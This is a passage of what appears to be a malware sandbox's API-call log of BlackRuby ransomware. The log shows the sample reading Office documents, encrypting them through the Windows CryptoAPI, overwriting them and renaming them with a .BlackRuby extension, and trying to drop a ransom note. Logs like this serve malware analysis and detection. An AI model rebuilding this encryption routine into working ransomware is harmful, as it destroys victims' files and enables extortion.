lpFileName="C:\\Users\\EEBsYm5\\Documents\\2j9RrIP nYhsFAcZPIA.xlsx", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\2j9RrIP nYhsFAcZPIA.xlsx", lpFilePart=0x0) returned 0x33 [0057.550] GetLastError () returned 0x0 [0057.550] SetErrorMode (uMode=0x1) returned 0x0 [0057.550] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2j9RrIP nYhsFAcZPIA.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\2j9rrip nyhsfaczpia.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x889050d0, ftCreationTime.dwHighDateTime=0x1d35398, ftLastAccessTime.dwLowDateTime=0x4d3d6fc0, ftLastAccessTime.dwHighDateTime=0x1d34d0a, ftLastWriteTime.dwLowDateTime=0x4d3d6fc0, ftLastWriteTime.dwHighDateTime=0x1d34d0a, nFileSizeHigh=0x0, nFileSizeLow=0xf2b3)) returned 1 [0057.550] GetLastError () returned 0x0 [0057.550] SetErrorMode (uMode=0x0) returned 0x1 [0057.587] CryptImportKey (in: hProv=0x37c818, pbData=0x1b7648c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360d20) returned 1 [0057.587] GetLastError () returned 0x0 [0057.587] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.587] GetLastError () returned 0x0 [0057.592] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.592] GetLastError () returned 0x0 [0057.592] CryptDuplicateKey (in: hKey=0x360d20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360f20) returned 1 [0057.593] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.593] GetLastError () returned 0x0 [0057.593] CryptSetKeyParam (hKey=0x360f20, dwParam=0x4, pbData=0x1ba34d8*=0x1, dwFlags=0x0) returned 1 [0057.593] GetLastError () returned 0x0 [0057.593] CryptSetKeyParam (hKey=0x360f20, dwParam=0x1, pbData=0x1ba34a4, dwFlags=0x0) returned 1 [0057.593] GetLastError () returned 0x0 [0057.593] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ba3520*, pdwDataLen=0x18ed74*=0xf3b0, dwBufLen=0xf3b0 | out: pbData=0x1ba3520*, pdwDataLen=0x18ed74*=0xf3b0) returned 1 [0057.593] GetLastError () returned 0x0 [0057.593] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bc1cac*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1bc1cac*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0057.593] GetLastError () returned 0x0 [0057.593] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bc1cdc*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1bc1cdc*, pdwDataLen=0x18ed94*=0x10) returned 1 [0057.593] GetLastError () returned 0x0 [0057.594] CryptDestroyKey (hKey=0x360d20) returned 1 [0057.594] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0057.594] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0057.594] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2j9RrIP nYhsFAcZPIA.xlsx", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\2j9RrIP nYhsFAcZPIA.xlsx", lpFilePart=0x0) returned 0x33 [0057.594] GetLastError () returned 0x0 [0057.594] SetErrorMode (uMode=0x1) returned 0x0 [0057.594] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2j9RrIP nYhsFAcZPIA.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\2j9rrip nyhsfaczpia.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.595] GetLastError () returned 0xb7 [0057.595] GetFileType (hFile=0x184) returned 0x1 [0057.595] SetErrorMode (uMode=0x0) returned 0x1 [0057.595] GetFileType (hFile=0x184) returned 0x1 [0057.597] CloseHandle (hObject=0x184) returned 1 [0057.597] GetLastError () returned 0xb7 [0057.597] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2j9RrIP nYhsFAcZPIA.xlsx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\2j9RrIP nYhsFAcZPIA.xlsx", lpFilePart=0x0) returned 0x33 [0057.597] GetLastError () returned 0xb7 [0057.597] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_ZSICe1QMfSxvhZm8xWu4E1DIRZkeeh5YDmrJSaY5qBCak.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Encrypted_ZSICe1QMfSxvhZm8xWu4E1DIRZkeeh5YDmrJSaY5qBCak.BlackRuby", lpFilePart=0x0) returned 0x5c [0057.597] GetLastError () returned 0xb7 [0057.597] SetErrorMode (uMode=0x1) returned 0x0 [0057.597] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2j9RrIP nYhsFAcZPIA.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\2j9rrip nyhsfaczpia.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x889050d0, ftCreationTime.dwHighDateTime=0x1d35398, ftLastAccessTime.dwLowDateTime=0x4d3d6fc0, ftLastAccessTime.dwHighDateTime=0x1d34d0a, ftLastWriteTime.dwLowDateTime=0x2a852480, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xf3c0)) returned 1 [0057.597] GetLastError () returned 0xb7 [0057.597] SetErrorMode (uMode=0x0) returned 0x1 [0057.597] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\2j9RrIP nYhsFAcZPIA.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\2j9rrip nyhsfaczpia.xlsx"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_ZSICe1QMfSxvhZm8xWu4E1DIRZkeeh5YDmrJSaY5qBCak.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\encrypted_zsice1qmfsxvhzm8xwu4e1dirzkeeh5ydmrjsay5qbcak.blackruby")) returned 1 [0057.597] GetLastError () returned 0xb7 [0057.598] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x33 [0057.598] GetLastError () returned 0xb7 [0057.598] SetErrorMode (uMode=0x1) returned 0x0 [0057.598] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0057.598] GetLastError () returned 0x5 [0057.599] SetErrorMode (uMode=0x0) returned 0x1 [0057.599] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\73jkVGa.pptx", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\73jkVGa.pptx", lpFilePart=0x0) returned 0x27 [0057.599] GetLastError () returned 0x5 [0057.599] SetErrorMode (uMode=0x1) returned 0x0 [0057.599] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\73jkVGa.pptx" (normalized: "c:\\users\\eebsym5\\documents\\73jkvga.pptx"), fInfoLevelId=0x0, lpFileInformation=0x1bee204 | out: lpFileInformation=0x1bee204*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x795f8d40, ftCreationTime.dwHighDateTime=0x1d39ce7, ftLastAccessTime.dwLowDateTime=0xac548e40, ftLastAccessTime.dwHighDateTime=0x1d37bc6, ftLastWriteTime.dwLowDateTime=0xac548e40, ftLastWriteTime.dwHighDateTime=0x1d37bc6, nFileSizeHigh=0x0, nFileSizeLow=0x14b9b)) returned 1 [0057.599] GetLastError () returned 0x5 [0057.599] SetErrorMode (uMode=0x0) returned 0x1 [0057.599] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\73jkVGa.pptx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\73jkVGa.pptx", lpFilePart=0x0) returned 0x27 [0057.599] GetLastError () returned 0x5 [0057.599] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\73jkVGa.pptx", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\73jkVGa.pptx", lpFilePart=0x0) returned 0x27 [0057.599] GetLastError () returned 0x5 [0057.599] SetErrorMode (uMode=0x1) returned 0x0 [0057.599] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\73jkVGa.pptx" (normalized: "c:\\users\\eebsym5\\documents\\73jkvga.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.599] GetLastError () returned 0x0 [0057.599] GetFileType (hFile=0x184) returned 0x1 [0057.600] SetErrorMode (uMode=0x0) returned 0x1 [0057.600] GetFileType (hFile=0x184) returned 0x1 [0057.600] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x14b9b [0057.600] GetLastError () returned 0x0 [0057.600] ReadFile (in: hFile=0x184, lpBuffer=0x1befef0, nNumberOfBytesToRead=0x14b9b, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1befef0*, lpNumberOfBytesRead=0x18ed84*=0x14b9b, lpOverlapped=0x0) returned 1 [0057.601] GetLastError () returned 0x0 [0057.601] CloseHandle (hObject=0x184) returned 1 [0057.601] GetLastError () returned 0x0 [0057.601] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\73jkVGa.pptx", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\73jkVGa.pptx", lpFilePart=0x0) returned 0x27 [0057.601] GetLastError () returned 0x0 [0057.601] SetErrorMode (uMode=0x1) returned 0x0 [0057.601] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\73jkVGa.pptx" (normalized: "c:\\users\\eebsym5\\documents\\73jkvga.pptx"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x795f8d40, ftCreationTime.dwHighDateTime=0x1d39ce7, ftLastAccessTime.dwLowDateTime=0xac548e40, ftLastAccessTime.dwHighDateTime=0x1d37bc6, ftLastWriteTime.dwLowDateTime=0xac548e40, ftLastWriteTime.dwHighDateTime=0x1d37bc6, nFileSizeHigh=0x0, nFileSizeLow=0x14b9b)) returned 1 [0057.601] GetLastError () returned 0x0 [0057.601] SetErrorMode (uMode=0x0) returned 0x1 [0057.601] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c680) returned 1 [0057.602] GetLastError () returned 0x0 [0057.636] CryptImportKey (in: hProv=0x37c680, pbData=0x1c5ed18, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360ee0) returned 1 [0057.636] GetLastError () returned 0x0 [0057.636] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.636] GetLastError () returned 0x0 [0057.641] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.641] GetLastError () returned 0x0 [0057.641] CryptDuplicateKey (in: hKey=0x360ee0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360b20) returned 1 [0057.641] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.641] GetLastError () returned 0x0 [0057.641] CryptSetKeyParam (hKey=0x360b20, dwParam=0x4, pbData=0x1c8bd64*=0x1, dwFlags=0x0) returned 1 [0057.641] GetLastError () returned 0x0 [0057.641] CryptSetKeyParam (hKey=0x360b20, dwParam=0x1, pbData=0x1c8bd30, dwFlags=0x0) returned 1 [0057.641] GetLastError () returned 0x0 [0057.642] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2b77e48*, pdwDataLen=0x18ed74*=0x14c90, dwBufLen=0x14c90 | out: pbData=0x2b77e48*, pdwDataLen=0x18ed74*=0x14c90) returned 1 [0057.642] GetLastError () returned 0x0 [0057.643] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c8bdc0*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c8bdc0*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0057.643] GetLastError () returned 0x0 [0057.643] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c8bdf0*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c8bdf0*, pdwDataLen=0x18ed94*=0x10) returned 1 [0057.643] GetLastError () returned 0x0 [0057.644] CryptDestroyKey (hKey=0x360ee0) returned 1 [0057.644] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0057.644] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0057.644] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\73jkVGa.pptx", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\73jkVGa.pptx", lpFilePart=0x0) returned 0x27 [0057.644] GetLastError () returned 0x0 [0057.644] SetErrorMode (uMode=0x1) returned 0x0 [0057.644] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\73jkVGa.pptx" (normalized: "c:\\users\\eebsym5\\documents\\73jkvga.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.645] GetLastError () returned 0xb7 [0057.645] GetFileType (hFile=0x184) returned 0x1 [0057.645] SetErrorMode (uMode=0x0) returned 0x1 [0057.645] GetFileType (hFile=0x184) returned 0x1 [0057.647] CloseHandle (hObject=0x184) returned 1 [0057.647] GetLastError () returned 0xb7 [0057.647] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\73jkVGa.pptx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\73jkVGa.pptx", lpFilePart=0x0) returned 0x27 [0057.647] GetLastError () returned 0xb7 [0057.647] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_lnXBpnX3W9MYxyVBOCvIRUsNKsAmaaPUlQXfhD.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Encrypted_lnXBpnX3W9MYxyVBOCvIRUsNKsAmaaPUlQXfhD.BlackRuby", lpFilePart=0x0) returned 0x55 [0057.647] GetLastError () returned 0xb7 [0057.647] SetErrorMode (uMode=0x1) returned 0x0 [0057.647] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\73jkVGa.pptx" (normalized: "c:\\users\\eebsym5\\documents\\73jkvga.pptx"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x795f8d40, ftCreationTime.dwHighDateTime=0x1d39ce7, ftLastAccessTime.dwLowDateTime=0xac548e40, ftLastAccessTime.dwHighDateTime=0x1d37bc6, ftLastWriteTime.dwLowDateTime=0x2a8eaa00, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x14ca0)) returned 1 [0057.647] GetLastError () returned 0xb7 [0057.647] SetErrorMode (uMode=0x0) returned 0x1 [0057.647] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\73jkVGa.pptx" (normalized: "c:\\users\\eebsym5\\documents\\73jkvga.pptx"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_lnXBpnX3W9MYxyVBOCvIRUsNKsAmaaPUlQXfhD.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\encrypted_lnxbpnx3w9myxyvbocvirusnksamaapulqxfhd.blackruby")) returned 1 [0057.648] GetLastError () returned 0xb7 [0057.648] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x33 [0057.648] GetLastError () returned 0xb7 [0057.648] SetErrorMode (uMode=0x1) returned 0x0 [0057.648] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0057.648] GetLastError () returned 0x5 [0057.649] SetErrorMode (uMode=0x0) returned 0x1 [0057.649] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\8EP_WxIF85aQ 6Hlwsf.docx", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\8EP_WxIF85aQ 6Hlwsf.docx", lpFilePart=0x0) returned 0x33 [0057.649] GetLastError () returned 0x5 [0057.649] SetErrorMode (uMode=0x1) returned 0x0 [0057.649] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\8EP_WxIF85aQ 6Hlwsf.docx" (normalized: "c:\\users\\eebsym5\\documents\\8ep_wxif85aq 6hlwsf.docx"), fInfoLevelId=0x0, lpFileInformation=0x1ca8ecc | out: lpFileInformation=0x1ca8ecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb19aeaa0, ftCreationTime.dwHighDateTime=0x1d3744d, ftLastAccessTime.dwLowDateTime=0x2df562f0, ftLastAccessTime.dwHighDateTime=0x1d31a18, ftLastWriteTime.dwLowDateTime=0x2df562f0, ftLastWriteTime.dwHighDateTime=0x1d31a18, nFileSizeHigh=0x0, nFileSizeLow=0x5c6f)) returned 1 [0057.649] GetLastError () returned 0x5 [0057.649] SetErrorMode (uMode=0x0) returned 0x1 [0057.649] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\8EP_WxIF85aQ 6Hlwsf.docx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\8EP_WxIF85aQ 6Hlwsf.docx", lpFilePart=0x0) returned 0x33 [0057.649] GetLastError () returned 0x5 [0057.649] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\8EP_WxIF85aQ 6Hlwsf.docx", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\8EP_WxIF85aQ 6Hlwsf.docx", lpFilePart=0x0) returned 0x33 [0057.649] GetLastError () returned 0x5 [0057.649] SetErrorMode (uMode=0x1) returned 0x0 [0057.649] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\8EP_WxIF85aQ 6Hlwsf.docx" (normalized: "c:\\users\\eebsym5\\documents\\8ep_wxif85aq 6hlwsf.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.649] GetLastError () returned 0x0 [0057.649] GetFileType (hFile=0x184) returned 0x1 [0057.649] SetErrorMode (uMode=0x0) returned 0x1 [0057.649] GetFileType (hFile=0x184) returned 0x1 [0057.649] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x5c6f [0057.649] GetLastError () returned 0x0 [0057.649] ReadFile (in: hFile=0x184, lpBuffer=0x1caae24, nNumberOfBytesToRead=0x5c6f, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1caae24*, lpNumberOfBytesRead=0x18ed84*=0x5c6f, lpOverlapped=0x0) returned 1 [0057.650] GetLastError () returned 0x0 [0057.650] CloseHandle (hObject=0x184) returned 1 [0057.650] GetLastError () returned 0x0 [0057.650] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\8EP_WxIF85aQ 6Hlwsf.docx", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\8EP_WxIF85aQ 6Hlwsf.docx", lpFilePart=0x0) returned 0x33 [0057.650] GetLastError () returned 0x0 [0057.650] SetErrorMode (uMode=0x1) returned 0x0 [0057.650] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\8EP_WxIF85aQ 6Hlwsf.docx" (normalized: "c:\\users\\eebsym5\\documents\\8ep_wxif85aq 6hlwsf.docx"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb19aeaa0, ftCreationTime.dwHighDateTime=0x1d3744d, ftLastAccessTime.dwLowDateTime=0x2df562f0, ftLastAccessTime.dwHighDateTime=0x1d31a18, ftLastWriteTime.dwLowDateTime=0x2df562f0, ftLastWriteTime.dwHighDateTime=0x1d31a18, nFileSizeHigh=0x0, nFileSizeLow=0x5c6f)) returned 1 [0057.650] GetLastError () returned 0x0 [0057.650] SetErrorMode (uMode=0x0) returned 0x1 [0057.661] CryptImportKey (in: hProv=0x37c790, pbData=0x1d10ad8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360ce0) returned 1 [0057.661] GetLastError () returned 0x0 [0057.661] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.661] GetLastError () returned 0x0 [0057.666] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.666] GetLastError () returned 0x0 [0057.666] CryptDuplicateKey (in: hKey=0x360ce0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360ae0) returned 1 [0057.666] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.666] GetLastError () returned 0x0 [0057.666] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x4, pbData=0x1d3db24*=0x1, dwFlags=0x0) returned 1 [0057.666] GetLastError () returned 0x0 [0057.666] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x1, pbData=0x1d3daf0, dwFlags=0x0) returned 1 [0057.666] GetLastError () returned 0x0 [0057.666] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d3db6c*, pdwDataLen=0x18ed74*=0x5d60, dwBufLen=0x5d60 | out: pbData=0x1d3db6c*, pdwDataLen=0x18ed74*=0x5d60) returned 1 [0057.666] GetLastError () returned 0x0 [0057.666] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d49658*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1d49658*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0057.666] GetLastError () returned 0x0 [0057.666] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d49688*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1d49688*, pdwDataLen=0x18ed94*=0x10) returned 1 [0057.667] GetLastError () returned 0x0 [0057.669] CryptDestroyKey (hKey=0x360ce0) returned 1 [0057.669] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0057.669] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0057.669] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\8EP_WxIF85aQ 6Hlwsf.docx", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\8EP_WxIF85aQ 6Hlwsf.docx", lpFilePart=0x0) returned 0x33 [0057.669] GetLastError () returned 0x0 [0057.669] SetErrorMode (uMode=0x1) returned 0x0 [0057.670] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\8EP_WxIF85aQ 6Hlwsf.docx" (normalized: "c:\\users\\eebsym5\\documents\\8ep_wxif85aq 6hlwsf.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.670] GetLastError () returned 0xb7 [0057.670] GetFileType (hFile=0x184) returned 0x1 [0057.670] SetErrorMode (uMode=0x0) returned 0x1 [0057.671] GetFileType (hFile=0x184) returned 0x1 [0057.671] WriteFile (in: hFile=0x184, lpBuffer=0x1b5de4c*, nNumberOfBytesToWrite=0x5d70, lpNumberOfBytesWritten=0x18ed90, lpOverlapped=0x0 | out: lpBuffer=0x1b5de4c*, lpNumberOfBytesWritten=0x18ed90*=0x5d70, lpOverlapped=0x0) returned 1 [0057.672] GetLastError () returned 0xb7 [0057.672] CloseHandle (hObject=0x184) returned 1 [0057.672] GetLastError () returned 0xb7 [0057.672] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\8EP_WxIF85aQ 6Hlwsf.docx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\8EP_WxIF85aQ 6Hlwsf.docx", lpFilePart=0x0) returned 0x33 [0057.672] GetLastError () returned 0xb7 [0057.672] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_YeZPuq8qrk4rPrrwXT8XyQIyYHIlQwmOwqabjGRk8YX4k.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Encrypted_YeZPuq8qrk4rPrrwXT8XyQIyYHIlQwmOwqabjGRk8YX4k.BlackRuby", lpFilePart=0x0) returned 0x5c [0057.673] GetLastError () returned 0xb7 [0057.673] SetErrorMode (uMode=0x1) returned 0x0 [0057.673] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\8EP_WxIF85aQ 6Hlwsf.docx" (normalized: "c:\\users\\eebsym5\\documents\\8ep_wxif85aq 6hlwsf.docx"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb19aeaa0, ftCreationTime.dwHighDateTime=0x1d3744d, ftLastAccessTime.dwLowDateTime=0x2df562f0, ftLastAccessTime.dwHighDateTime=0x1d31a18, ftLastWriteTime.dwLowDateTime=0x2a910b60, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x5d70)) returned 1 [0057.673] GetLastError () returned 0xb7 [0057.673] SetErrorMode (uMode=0x0) returned 0x1 [0057.673] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\8EP_WxIF85aQ 6Hlwsf.docx" (normalized: "c:\\users\\eebsym5\\documents\\8ep_wxif85aq 